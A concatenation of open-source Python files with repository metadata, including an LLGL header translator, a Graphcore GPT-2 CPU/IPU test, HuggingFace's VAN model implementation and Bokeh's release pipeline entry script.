self.closeScope()
self.statement('')
self.statement('')
# Write all enumerations
if len(doc.enums) > 0:
self.statement('/* ----- Enumerations ----- */')
self.statement('')
for enum in doc.enums:
self.statement('public enum ' + enum.name)
self.openScope()
# Write enumeration entry declarations
declList = Translator.DeclarationList()
for field in enum.fields:
declList.append(Translator.Declaration('', field.name, field.init))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('')
self.statement('')
# Write all flags
if len(doc.flags) > 0:
def translateFlagInitializer(init):
str = init
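                # Descriptive note (added): insert spaces around binary operators so the generated
                # C# reads naturally, e.g. '(1<<1)' becomes '(1 << 1)'.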
str = re.sub(r'(\||<<|>>|\+|\-|\*|\/)', r' \1 ', str)
return str
self.statement('/* ----- Flags ----- */')
self.statement('')
for flag in doc.flags:
self.statement('[Flags]')
self.statement('public enum {} : uint'.format(flag.name))
basename = flag.name[:-len('Flags')]
self.openScope()
# Write flag entry declarations
declList = Translator.DeclarationList()
for field in flag.fields:
declList.append(Translator.Declaration('', field.name, translateFlagInitializer(field.init) if field.init else None))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('')
self.statement('')
# Write all structures
commonStructs = list(filter(lambda record: not record.hasConstFieldsOnly(), doc.structs))
class CsharpDeclaration:
marshal = None
type = ''
ident = ''
def __init__(self, ident):
self.marshal = None
self.type = ''
self.ident = ident
def translateDecl(type, ident = None, isInsideStruct = False):
decl = CsharpDeclaration(ident)
def sanitizeTypename(typename):
if typename.startswith(LLGLMeta.typePrefix):
return typename[len(LLGLMeta.typePrefix):]
elif typename in [LLGLMeta.UTF8STRING, LLGLMeta.STRING]:
return 'string'
else:
return typename
nonlocal builtinTypenames
if type.baseType == StdType.STRUCT and type.typename in LLGLMeta.interfaces:
decl.type = sanitizeTypename(type.typename)
else:
builtin = builtinTypenames.get(type.baseType)
if isInsideStruct:
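                    # Descriptive note (added): inside a struct, fixed-size arrays of builtin types
                    # become C# 'fixed' buffers; fixed-size arrays of other types are marshalled with
                    # a ByValArray attribute and declared as managed arrays instead.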
if type.arraySize > 0 and builtin:
decl.type += 'fixed '
decl.type += builtin if builtin else sanitizeTypename(type.typename)
if type.isPointer:
decl.type += '*'
elif type.arraySize > 0:
if builtin:
decl.ident += f'[{type.arraySize}]'
else:
decl.marshal = f'MarshalAs(UnmanagedType.ByValArray, SizeConst = {type.arraySize})'
decl.type += '[]'
else:
decl.type += builtin if builtin else sanitizeTypename(type.typename)
if type.isPointer or type.arraySize > 0:
decl.type += '*'
return decl
if len(commonStructs) > 0:
self.statement('/* ----- Structures ----- */')
self.statement('')
for struct in commonStructs:
self.statement('public unsafe struct ' + struct.name)
self.openScope()
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
if not field.type.externalCond:
# Write two fields for dynamic arrays
if field.type.arraySize == -1:
declList.append(Translator.Declaration('UIntPtr', 'num{}{}'.format(field.name[0].upper(), field.name[1:])))
fieldDecl = translateDecl(field.type, field.name, isInsideStruct = True)
if fieldDecl.marshal:
declList.append(Translator.Declaration(None, fieldDecl.marshal))
declList.append(Translator.Declaration(fieldDecl.type, fieldDecl.ident, field.init))
for decl in declList.decls:
if not decl.type:
self.statement(f'[{decl.name}]')
elif decl.init:
self.statement(f'public {decl.type}{declList.spaces(0, decl.type)}{decl.name};{declList.spaces(1, decl.name)}/* = {decl.init} */')
else:
self.statement(f'public {decl.type}{declList.spaces(0, decl.type)}{decl.name};')
self.closeScope()
self.statement('')
self.statement('')
# Write all functions
if len(doc.funcs) > 0:
self.statement('/* ----- Functions ----- */')
self.statement('')
for func in doc.funcs:
                self.statement(f'[DllImport(DllName, EntryPoint="{func.name}", CallingConvention=CallingConvention.Cdecl)]')
returnTypeStr = translateDecl(func.returnType).type
paramListStr = ''
for param in func.params:
if len(paramListStr) > 0:
paramListStr += ', '
paramDecl = translateDecl(param.type, param.name)
paramListStr += f'{paramDecl.type} {paramDecl.ident}'
funcName = func.name[len(LLGLMeta.funcPrefix):]
                self.statement(f'public static extern unsafe {returnTypeStr} {funcName}({paramListStr});')
self.statement('')
self.statement('')
self.closeScope()
self.closeScope()
self.statement('')
self.statement('')
self.statement('')
self.statement('')
self.statement('// ================================================================================')
def main():
args = sys.argv[1:]
translator = Translator()
files = list(filter(lambda arg: len(arg) > 0 and arg[0] != '-', args))
if len(files) > 0:
# Is there an override name to use as single header output?
def findArgValue(args, search):
argIndex = 0
while argIndex < len(args):
arg = args[argIndex]
if len(arg) > len(search) + 1 and arg[:len(search)] == search and arg[len(search)] == '=':
return arg[len(search) + 1:]
argIndex += 1
return None
singleName = findArgValue(args, '-name')
        # Are function declarations included?
processFunctions = '-fn' in args
# Parse input headers
modules = iterate(lambda filename: parseFile(filename, processFunctions), files)
if singleName and len(modules) > 0:
singleModule = modules[0]
singleModule.name = singleName
if len(modules) > 1:
for module in modules[1:]:
singleModule.merge(module)
singleModule.structs = singleModule.sortStructsByDependencies()
modules = [singleModule]
# Translate or just print meta data of input header files
if '-c99' in args:
iterate(translator.translateModuleToC99, modules)
elif '-csharp' in args:
iterate(translator.translateModuleToCsharp, modules)
else:
iterate(printModule, modules)
else:
printHelp()
main()
|
419d4683c2eb672216edf2515a6a154f8be8a7ac
|
753cd066a9bd26b6c37c8d53a86c7a9c659ec18c
|
/nlp/gpt2/pytorch/tests/cpu_ipu_test.py
|
fa2a0f36f15c465335b4b31c23890bafe49ebb32
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
graphcore/examples
|
ac872015808ed2a913d4d7bf0d63202ce15ebbae
|
e2f834dd60e7939672c1795b4ac62e89ad0bca49
|
refs/heads/master
| 2023-08-05T02:08:12.341836
| 2023-07-27T11:13:10
| 2023-07-27T11:13:10
| 143,977,106
| 311
| 80
|
MIT
| 2023-09-11T16:42:56
| 2018-08-08T07:29:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,500
|
py
|
cpu_ipu_test.py
|
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import warnings
import pytest
import torch
import poptorch
import numpy as np
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from transformers import GPT2Config, GPT2LMHeadModel
import import_helper
from arguments import set_args
from train_gpt2 import GPT2Wrapper
from model.optimized_gpt2_attn import OptimizedGPT2Attention
warnings.filterwarnings("ignore", category=torch.jit.TracerWarning)
base_dir = os.path.abspath(os.path.dirname(__file__))
class cpu_wrapper(nn.Module):
def __init__(self, config):
super().__init__()
self.model = GPT2LMHeadModel(config=config)
for layer in self.model.transformer.h:
gpt2_attn = OptimizedGPT2Attention(self.model.config, layer_idx=layer.attn.layer_idx)
gpt2_attn.load_state_dict(layer.attn.state_dict())
layer.attn = gpt2_attn
def forward(self, input_ids, labels):
transformer_outputs = self.model.transformer(input_ids=input_ids)
hidden_states = transformer_outputs[0]
lm_logits = self.model.lm_head(hidden_states)
loss_fct = CrossEntropyLoss()
loss = loss_fct(lm_logits.view(-1, lm_logits.size(-1)), labels.view(-1))
loss = poptorch.identity_loss(loss, reduction="none")
acc = torch.Tensor(0)
return loss, acc
@pytest.mark.ipus(1)
def test_ipu_cpu_match():
"""
    Test that the GPT2 model run on the IPU approximately matches the same
    model run on the CPU.
"""
# Config
cmd_line = """
--batch-size 1
--embedding-serialization-factor 2
--layers-per-ipu 1 3
--matmul-proportion 0.2 0.2
--recompute-checkpoint-every-layer True
""".split()
args = set_args(cmd_line)
batch_size = args.batch_size
config = GPT2Config.from_json_file(base_dir + "/../config/config.json")
config.model = "gpt2"
config.attn_pdrop = 0.0
config.embd_pdrop = 0.0
config.resid_pdrop = 0.0
config.summary_first_dropout = 0.0
config.activation_function = "gelu"
config.n_layer = 4
config.n_embd = 256
config.n_head = 2
config.vocab_size = 20256
config.n_positions = 128
# Models and options
opts = poptorch.Options().deviceIterations(1)
opts.setExecutionStrategy(poptorch.ShardedExecution(poptorch.AutoStage.AutoIncrement))
opts.Training.gradientAccumulation(1)
opts.replicationFactor(1)
opts.Precision.setPartialsType(torch.float32)
opts.outputMode(poptorch.OutputMode.Final)
opts.randomSeed(1234)
model_cpu = cpu_wrapper(config=config).train()
model_ipu = GPT2Wrapper(args, config).train()
model_ipu.load_state_dict(model_cpu.state_dict())
# Check that copy was successful
assert model_ipu is not model_cpu
assert all([(a == b).all() for a, b in zip(model_cpu.parameters(), model_ipu.parameters())]) is True
optimizer_cpu = torch.optim.AdamW(model_cpu.parameters(), lr=0.001)
optimizer_ipu = poptorch.optim.AdamW(model_ipu.model.parameters(), lr=0.001, loss_scaling=1.0)
poptorch_model = poptorch.trainingModel(model_ipu, opts, optimizer=optimizer_ipu)
# Input
tokens = torch.randint(0, 20256, (129,))
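    # Shift the 129 sampled tokens by one position so inputs and labels are both
    # 128 tokens long and each position predicts the next token.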
labels = torch.tensor(tokens[1:])
tokens = torch.tensor(tokens[:-1])
batch_input = (tokens.repeat(batch_size, 1), labels.repeat(batch_size, 1))
# Training Loop
for step in range(10):
# Step CPU model
optimizer_cpu.zero_grad()
cpu_output = model_cpu(*batch_input)
cpu_loss = cpu_output[0]
cpu_loss.backward()
optimizer_cpu.step()
# Step IPU Model
ipu_output = poptorch_model(*batch_input)
ipu_loss = ipu_output[0]
with torch.no_grad():
print(f"CPU Loss: {cpu_loss}, IPU Loss: {ipu_loss}")
# Check the losses are approximately equal
assert np.allclose(cpu_loss.numpy(), ipu_loss.numpy(), rtol=1e-2)
|
f0e96e9c0595800dafa1d1faa0de0588973b4125
|
c46754b9600a12df4f9d7a6320dfc19aa96b1e1d
|
/src/transformers/models/deprecated/van/modeling_van.py
|
4ef18f54158f91a0af1717d088208121b500ac91
|
[
"Apache-2.0"
] |
permissive
|
huggingface/transformers
|
ccd52a0d7c59e5f13205f32fd96f55743ebc8814
|
4fa0aff21ee083d0197a898cdf17ff476fae2ac3
|
refs/heads/main
| 2023-09-05T19:47:38.981127
| 2023-09-05T19:21:33
| 2023-09-05T19:21:33
| 155,220,641
| 102,193
| 22,284
|
Apache-2.0
| 2023-09-14T20:44:49
| 2018-10-29T13:56:00
|
Python
|
UTF-8
|
Python
| false
| false
| 21,606
|
py
|
modeling_van.py
|
# coding=utf-8
# Copyright 2022 BNRist (Tsinghua University), TKLNDST (Nankai University) and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Visual Attention Network (VAN) model."""
import math
from collections import OrderedDict
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ....activations import ACT2FN
from ....modeling_outputs import (
BaseModelOutputWithNoAttention,
BaseModelOutputWithPoolingAndNoAttention,
ImageClassifierOutputWithNoAttention,
)
from ....modeling_utils import PreTrainedModel
from ....utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward, logging
from .configuration_van import VanConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "VanConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "Visual-Attention-Network/van-base"
_EXPECTED_OUTPUT_SHAPE = [1, 512, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "Visual-Attention-Network/van-base"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tabby, tabby cat"
VAN_PRETRAINED_MODEL_ARCHIVE_LIST = [
"Visual-Attention-Network/van-base",
# See all VAN models at https://huggingface.co/models?filter=van
]
# Copied from transformers.models.convnext.modeling_convnext.drop_path
def drop_path(input: torch.Tensor, drop_prob: float = 0.0, training: bool = False) -> torch.Tensor:
"""
Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
Comment by Ross Wightman: This is the same as the DropConnect impl I created for EfficientNet, etc networks,
however, the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for changing the
layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use 'survival rate' as the
argument.
"""
if drop_prob == 0.0 or not training:
return input
keep_prob = 1 - drop_prob
shape = (input.shape[0],) + (1,) * (input.ndim - 1) # work with diff dim tensors, not just 2D ConvNets
random_tensor = keep_prob + torch.rand(shape, dtype=input.dtype, device=input.device)
random_tensor.floor_() # binarize
output = input.div(keep_prob) * random_tensor
return output
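# Illustrative sketch (added, not part of the original VAN sources): a tiny helper that
# exercises drop_path. With drop_prob=0.25 each sample's residual branch is either zeroed
# or scaled by 1/(1 - 0.25), so the batch expectation matches the un-dropped activation.
def _drop_path_example() -> torch.Tensor:
    example = torch.ones(8, 3, 4, 4)
    return drop_path(example, drop_prob=0.25, training=True)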
# Copied from transformers.models.convnext.modeling_convnext.ConvNextDropPath with ConvNext->Van
class VanDropPath(nn.Module):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks)."""
def __init__(self, drop_prob: Optional[float] = None) -> None:
super().__init__()
self.drop_prob = drop_prob
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
return drop_path(hidden_states, self.drop_prob, self.training)
def extra_repr(self) -> str:
return "p={}".format(self.drop_prob)
class VanOverlappingPatchEmbedder(nn.Module):
"""
    Downsamples the input using a patchify operation with a `stride` of 4 by default, making adjacent windows overlap by
half of the area. From [PVTv2: Improved Baselines with Pyramid Vision
Transformer](https://arxiv.org/abs/2106.13797).
"""
def __init__(self, in_channels: int, hidden_size: int, patch_size: int = 7, stride: int = 4):
super().__init__()
self.convolution = nn.Conv2d(
in_channels, hidden_size, kernel_size=patch_size, stride=stride, padding=patch_size // 2
)
self.normalization = nn.BatchNorm2d(hidden_size)
def forward(self, input: torch.Tensor) -> torch.Tensor:
hidden_state = self.convolution(input)
hidden_state = self.normalization(hidden_state)
return hidden_state
class VanMlpLayer(nn.Module):
"""
MLP with depth-wise convolution, from [PVTv2: Improved Baselines with Pyramid Vision
Transformer](https://arxiv.org/abs/2106.13797).
"""
def __init__(
self,
in_channels: int,
hidden_size: int,
out_channels: int,
hidden_act: str = "gelu",
dropout_rate: float = 0.5,
):
super().__init__()
self.in_dense = nn.Conv2d(in_channels, hidden_size, kernel_size=1)
self.depth_wise = nn.Conv2d(hidden_size, hidden_size, kernel_size=3, padding=1, groups=hidden_size)
self.activation = ACT2FN[hidden_act]
self.dropout1 = nn.Dropout(dropout_rate)
self.out_dense = nn.Conv2d(hidden_size, out_channels, kernel_size=1)
self.dropout2 = nn.Dropout(dropout_rate)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
hidden_state = self.in_dense(hidden_state)
hidden_state = self.depth_wise(hidden_state)
hidden_state = self.activation(hidden_state)
hidden_state = self.dropout1(hidden_state)
hidden_state = self.out_dense(hidden_state)
hidden_state = self.dropout2(hidden_state)
return hidden_state
class VanLargeKernelAttention(nn.Module):
"""
Basic Large Kernel Attention (LKA).
"""
def __init__(self, hidden_size: int):
super().__init__()
self.depth_wise = nn.Conv2d(hidden_size, hidden_size, kernel_size=5, padding=2, groups=hidden_size)
self.depth_wise_dilated = nn.Conv2d(
hidden_size, hidden_size, kernel_size=7, dilation=3, padding=9, groups=hidden_size
)
self.point_wise = nn.Conv2d(hidden_size, hidden_size, kernel_size=1)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
hidden_state = self.depth_wise(hidden_state)
hidden_state = self.depth_wise_dilated(hidden_state)
hidden_state = self.point_wise(hidden_state)
return hidden_state
class VanLargeKernelAttentionLayer(nn.Module):
"""
Computes attention using Large Kernel Attention (LKA) and attends the input.
"""
def __init__(self, hidden_size: int):
super().__init__()
self.attention = VanLargeKernelAttention(hidden_size)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
attention = self.attention(hidden_state)
attended = hidden_state * attention
return attended
class VanSpatialAttentionLayer(nn.Module):
"""
    Van spatial attention layer composed of projection (via conv) -> act -> Large Kernel Attention (LKA) attention ->
projection (via conv) + residual connection.
"""
def __init__(self, hidden_size: int, hidden_act: str = "gelu"):
super().__init__()
self.pre_projection = nn.Sequential(
OrderedDict(
[
("conv", nn.Conv2d(hidden_size, hidden_size, kernel_size=1)),
("act", ACT2FN[hidden_act]),
]
)
)
self.attention_layer = VanLargeKernelAttentionLayer(hidden_size)
self.post_projection = nn.Conv2d(hidden_size, hidden_size, kernel_size=1)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
residual = hidden_state
hidden_state = self.pre_projection(hidden_state)
hidden_state = self.attention_layer(hidden_state)
hidden_state = self.post_projection(hidden_state)
hidden_state = hidden_state + residual
return hidden_state
class VanLayerScaling(nn.Module):
"""
Scales the inputs by a learnable parameter initialized by `initial_value`.
"""
def __init__(self, hidden_size: int, initial_value: float = 1e-2):
super().__init__()
self.weight = nn.Parameter(initial_value * torch.ones((hidden_size)), requires_grad=True)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
# unsqueezing for broadcasting
hidden_state = self.weight.unsqueeze(-1).unsqueeze(-1) * hidden_state
return hidden_state
class VanLayer(nn.Module):
"""
    Van layer composed of normalization layers, large kernel attention (LKA) and a multi-layer perceptron (MLP).
"""
def __init__(
self,
config: VanConfig,
hidden_size: int,
mlp_ratio: int = 4,
drop_path_rate: float = 0.5,
):
super().__init__()
self.drop_path = VanDropPath(drop_path_rate) if drop_path_rate > 0.0 else nn.Identity()
self.pre_normomalization = nn.BatchNorm2d(hidden_size)
self.attention = VanSpatialAttentionLayer(hidden_size, config.hidden_act)
self.attention_scaling = VanLayerScaling(hidden_size, config.layer_scale_init_value)
self.post_normalization = nn.BatchNorm2d(hidden_size)
self.mlp = VanMlpLayer(
hidden_size, hidden_size * mlp_ratio, hidden_size, config.hidden_act, config.dropout_rate
)
self.mlp_scaling = VanLayerScaling(hidden_size, config.layer_scale_init_value)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
residual = hidden_state
# attention
hidden_state = self.pre_normomalization(hidden_state)
hidden_state = self.attention(hidden_state)
hidden_state = self.attention_scaling(hidden_state)
hidden_state = self.drop_path(hidden_state)
# residual connection
hidden_state = residual + hidden_state
residual = hidden_state
# mlp
hidden_state = self.post_normalization(hidden_state)
hidden_state = self.mlp(hidden_state)
hidden_state = self.mlp_scaling(hidden_state)
hidden_state = self.drop_path(hidden_state)
# residual connection
hidden_state = residual + hidden_state
return hidden_state
class VanStage(nn.Module):
"""
VanStage, consisting of multiple layers.
"""
def __init__(
self,
config: VanConfig,
in_channels: int,
hidden_size: int,
patch_size: int,
stride: int,
depth: int,
mlp_ratio: int = 4,
drop_path_rate: float = 0.0,
):
super().__init__()
self.embeddings = VanOverlappingPatchEmbedder(in_channels, hidden_size, patch_size, stride)
self.layers = nn.Sequential(
*[
VanLayer(
config,
hidden_size,
mlp_ratio=mlp_ratio,
drop_path_rate=drop_path_rate,
)
for _ in range(depth)
]
)
self.normalization = nn.LayerNorm(hidden_size, eps=config.layer_norm_eps)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
hidden_state = self.embeddings(hidden_state)
hidden_state = self.layers(hidden_state)
# rearrange b c h w -> b (h w) c
batch_size, hidden_size, height, width = hidden_state.shape
hidden_state = hidden_state.flatten(2).transpose(1, 2)
hidden_state = self.normalization(hidden_state)
        # rearrange b (h w) c -> b c h w
hidden_state = hidden_state.view(batch_size, height, width, hidden_size).permute(0, 3, 1, 2)
return hidden_state
class VanEncoder(nn.Module):
"""
VanEncoder, consisting of multiple stages.
"""
def __init__(self, config: VanConfig):
super().__init__()
self.stages = nn.ModuleList([])
patch_sizes = config.patch_sizes
strides = config.strides
hidden_sizes = config.hidden_sizes
depths = config.depths
mlp_ratios = config.mlp_ratios
drop_path_rates = [x.item() for x in torch.linspace(0, config.drop_path_rate, sum(config.depths))]
for num_stage, (patch_size, stride, hidden_size, depth, mlp_expantion, drop_path_rate) in enumerate(
zip(patch_sizes, strides, hidden_sizes, depths, mlp_ratios, drop_path_rates)
):
is_first_stage = num_stage == 0
in_channels = hidden_sizes[num_stage - 1]
if is_first_stage:
in_channels = config.num_channels
self.stages.append(
VanStage(
config,
in_channels,
hidden_size,
patch_size=patch_size,
stride=stride,
depth=depth,
mlp_ratio=mlp_expantion,
drop_path_rate=drop_path_rate,
)
)
def forward(
self,
hidden_state: torch.Tensor,
output_hidden_states: Optional[bool] = False,
return_dict: Optional[bool] = True,
) -> Union[Tuple, BaseModelOutputWithNoAttention]:
all_hidden_states = () if output_hidden_states else None
for _, stage_module in enumerate(self.stages):
hidden_state = stage_module(hidden_state)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_state,)
if not return_dict:
return tuple(v for v in [hidden_state, all_hidden_states] if v is not None)
return BaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=all_hidden_states)
class VanPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = VanConfig
base_model_prefix = "van"
main_input_name = "pixel_values"
supports_gradient_checkpointing = True
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, nn.Linear):
nn.init.trunc_normal_(module.weight, std=self.config.initializer_range)
if isinstance(module, nn.Linear) and module.bias is not None:
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.LayerNorm):
nn.init.constant_(module.bias, 0)
nn.init.constant_(module.weight, 1.0)
elif isinstance(module, nn.Conv2d):
fan_out = module.kernel_size[0] * module.kernel_size[1] * module.out_channels
fan_out //= module.groups
module.weight.data.normal_(0, math.sqrt(2.0 / fan_out))
if module.bias is not None:
module.bias.data.zero_()
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, VanModel):
module.gradient_checkpointing = value
VAN_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`VanConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
VAN_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`ConvNextImageProcessor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all stages. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare VAN model outputting raw features without any specific head on top. Note, VAN does not have an embedding"
" layer.",
VAN_START_DOCSTRING,
)
class VanModel(VanPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.config = config
self.encoder = VanEncoder(config)
# final layernorm layer
self.layernorm = nn.LayerNorm(config.hidden_sizes[-1], eps=config.layer_norm_eps)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(VAN_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPoolingAndNoAttention,
config_class=_CONFIG_FOR_DOC,
modality="vision",
expected_output=_EXPECTED_OUTPUT_SHAPE,
)
def forward(
self,
pixel_values: Optional[torch.FloatTensor],
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, BaseModelOutputWithPoolingAndNoAttention]:
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
encoder_outputs = self.encoder(
pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
last_hidden_state = encoder_outputs[0]
# global average pooling, n c w h -> n c
pooled_output = last_hidden_state.mean(dim=[-2, -1])
if not return_dict:
return (last_hidden_state, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=last_hidden_state,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
)
@add_start_docstrings(
"""
VAN Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
ImageNet.
""",
VAN_START_DOCSTRING,
)
class VanForImageClassification(VanPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.van = VanModel(config)
# Classifier head
self.classifier = (
nn.Linear(config.hidden_sizes[-1], config.num_labels) if config.num_labels > 0 else nn.Identity()
)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(VAN_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_IMAGE_CLASS_CHECKPOINT,
output_type=ImageClassifierOutputWithNoAttention,
config_class=_CONFIG_FOR_DOC,
expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
)
def forward(
self,
pixel_values: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, ImageClassifierOutputWithNoAttention]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.van(pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict)
pooled_output = outputs.pooler_output if return_dict else outputs[1]
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.config.num_labels == 1:
self.config.problem_type = "regression"
elif self.config.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.config.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.config.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return ImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
|
de183954421ea126c5702d50e0fefa9e54e6bdc7
|
5105403f2b75990654519438d8ceabcf80962ebf
|
/release/__main__.py
|
3546093f59fbc956d4a730773670d52df6775513
|
[
"BSD-3-Clause"
] |
permissive
|
bokeh/bokeh
|
ed1d81eb07d27d27c6710c9fec9114886047f528
|
310cb2cbeabc4c4b8180cbda566df16039737cdc
|
refs/heads/branch-3.3
| 2023-08-31T23:53:06.537061
| 2023-08-30T03:43:05
| 2023-08-30T03:43:05
| 3,834,332
| 17,174
| 5,251
|
BSD-3-Clause
| 2023-09-14T11:37:23
| 2012-03-26T15:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 1,901
|
py
|
__main__.py
|
# -----------------------------------------------------------------------------
# Copyright (c) 2012 - 2023, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import annotations
# Standard library imports
import sys
# Bokeh imports
from . import stages
from .config import Config
from .pipeline import Pipeline
from .system import System
from .util import load_config, save_config
system = System()
stage_generators = {
"generate-build-checks": stages.BUILD_CHECKS,
"generate-build-steps": stages.BUILD_STEPS,
"generate-deploy-checks": stages.DEPLOY_CHECKS,
"generate-deploy-steps": stages.DEPLOY_STEPS,
}
if len(sys.argv) == 3 and sys.argv[1] == "generate-config":
config = Config(sys.argv[2])
save_config(config)
sys.exit(0)
if len(sys.argv) == 2 and sys.argv[1] in stage_generators:
print([func.__name__ for func in stage_generators[sys.argv[1]]])
sys.exit(0)
if len(sys.argv) == 2 and sys.argv[1] in dir(stages):
config = load_config()
func = getattr(stages, sys.argv[1])
pipe = Pipeline([func], config, system)
pipe.execute()
save_config(config)
sys.exit(0)
if len(sys.argv) == 3 and sys.argv[1] == "build":
config = Config(sys.argv[2])
check = Pipeline(stages.BUILD_CHECKS, config, system)
check.execute()
steps = Pipeline(stages.BUILD_STEPS, config, system)
steps.execute()
sys.exit(0)
if len(sys.argv) == 3 and sys.argv[1] == "deploy":
config = Config(sys.argv[2])
check = Pipeline(stages.DEPLOY_CHECKS, config, system)
check.execute()
steps = Pipeline(stages.DEPLOY_STEPS, config, system)
steps.execute()
sys.exit(0)
raise RuntimeError(f"Unrecognized args: {sys.argv[1:]}")
|
2f57c530289bc46d8413e7e267875b4ece65c5c6
|
6564f42640e11689c2ddb6b92325afe6fddc6a6f
|
/cumulusci/tasks/preflight/recordtypes.py
|
e56e3d9ae97e15367cdd6cb2a506b13f40769110
|
[
